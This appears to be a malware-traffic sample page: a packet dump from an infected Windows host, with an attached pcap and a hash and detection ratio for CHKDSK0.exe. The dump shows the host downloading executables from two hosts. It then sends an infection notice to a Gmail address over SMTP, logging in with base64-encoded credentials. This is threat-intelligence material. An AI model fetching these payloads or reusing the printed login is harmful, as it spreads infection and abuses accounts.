Unknown E-mail C2 Malware u.teknik.io PCAP file download traffic sample CHKDSK0.exe

Download Attachments

  • 1 pcap QrQ
    Date added: November 30, 2017 3:22 am Added by: admin File size: 38 KB Downloads: 25


017-11-29 20:09:32.668784 IP 192.168.1.102.51077 > 185.165.168.124.80: Flags [P.], seq 1471042674:1471043157, ack 3475486176, win 256, length 483: HTTP: GET /OrQwS.exe HTTP/1.1
E…a.@…r….f…|…PW.Tr.’..P…t…GET /OrQwS.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: u.teknik.io
Connection: Keep-Alive

2017-11-29 20:09:33.242526 IP 192.168.1.102.51078 > 185.165.168.124.80: Flags [P.], seq 1583158942:1583159215, ack 67316816, win 256, length 273: HTTP: GET /favicon.ico HTTP/1.1
E..9a.@…s….f…|…P^]….,PP…4…GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: u.teknik.io
Connection: Keep-Alive

2017-11-29 20:09:33.569644 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 3619213119:3619213243, ack 3644869978, win 256, length 124
E…a.@…tT…f…|…….?.@MZP…’…….w…s..Z.Y..@…..[.8..v.UZ..y..e…M……/.5…
….. .
.2.8…….2…………..u.teknik.io……….
…………..
2017-11-29 20:09:33.754167 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 124:258, ack 3824, win 253, length 134
E…a.@…tH…f…|………@\IP………..F…BA.%.{.0;b..(],.(….-.3..A8Z2a…..<……….V#…`uO..4..i.d.(.f……….0.I.0…N.QI….G….#.GpY}…”y.=..L….c.C.+,.F
2017-11-29 20:09:48.455196 IP 192.168.1.102.51081 > 62.210.16.62.80: Flags [P.], seq 3611755535:3611756033, ack 900678019, win 256, length 498: HTTP: GET /images/CHKDSK0.exe HTTP/1.1
E…Z.@….<…f>..>…P.G..5.A.P…^…GET /images/CHKDSK0.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: lesfaverelles.com
Connection: Keep-Alive

2017-11-29 20:09:55.254339 IP 192.168.1.102.51079 > 185.165.168.124.443: Flags [P.], seq 258:567, ack 3883, win 252, length 309
E..]a.@…s….f…|…….A.@\.P…q…….0[x!..S..U…..}At(y.&..\..sy……..3Px.i…e…..59.9yt,hK….L…………..l.>….U6….d.v.`.L..+._JF!.’i.T..j:…q…5..0.4Z..].)..^.U .-..O.A…….s.Hv.,……..7…W/…e…~..}.XP6..=..<…..l….i…(..$..q..U…c….Z5..J].y7tB.q.w.;v…&B..At……z………z…,1..@.HK.S..DJ..{…^mMa.,I ..
2017-11-29 20:09:58.688125 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 3008276012:3008276034, ack 1709128300, win 255, length 22
E..>I.@…fW…fC.El…K.N.,e.:lP…….EHLO WIN-1OC0SUPRH6P

2017-11-29 20:09:58.726262 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 22:34, ack 173, win 255, length 12
E..4I.@…f`…fC.El…K.N.Be.;.P…C…AUTH LOGIN

2017-11-29 20:09:58.762505 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 34:76, ack 191, win 255, length 42
E..RI.@…fA…fC.El…K.N.Ne.;*P….@..Y2FwaXhhYmExQHBvc3RvY2FwaXhhYmEuY29tLmJy

2017-11-29 20:09:58.800161 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 76:90, ack 209, win 255, length 14
E..6I.@…f\…fC.El…K.N.xe.;<P….b..Y2FwaXhhYmEx

2017-11-29 20:09:58.839926 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 90:134, ack 239, win 255, length 44
E..TI.@…f=…fC.El…K.N..e.;ZP…_…MAIL FROM:<capixaba1@postocapixaba.com.br>

2017-11-29 20:09:58.874650 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 134:170, ack 247, win 254, length 36
E..LI @…fD…fC.El…K.N..e.;bP…….RCPT TO:<ricmarques2016@gmail.com>

2017-11-29 20:09:58.940366 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 170:176, ack 261, win 254, length 6
E…I!@…fa…fC.El…K.N..e.;pP…….DATA

2017-11-29 20:09:58.985032 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 176:459, ack 317, win 254, length 283
E..CI”@…eK…fC.El…K.N..e.;.P…….From: “Maq: WIN-1OC0SUPRH6P” <capixaba1@postocapixaba.com.br>
Subject: +1 Infect de Trocador! 99189
To: ricmarques2016@gmail.com
Newsgroups: “+1 INFECT DO TROCADOR DE ENDERE?O!”
Content-Type: text/html; charset=us-ascii
MIME-Version: 1.0
Date: Wed, 29 Nov 2017 20:06:39 -0500

2017-11-29 20:09:59.073221 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 459:503, ack 317, win 254, length 44
E..TI#@…f9…fC.El…K.N..e.;.P…….
+1 INFECT DE TROCADOR DE ENDERE?OS!

.

2017-11-29 20:09:59.124003 IP 192.168.1.102.51085 > 67.205.69.108.587: Flags [P.], seq 503:509, ack 345, win 254, length 6
E…I$@…f^…fC.El…K.N.#e.;.P…….QUIT

 

 

 

SHA256: 6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6
File name: CHKDSK0.exe
Detection ratio: 44 / 67
Analysis date: 2017-11-30 03:15:57 UTC ( 0 minutes ago )

 

 

Leave a Reply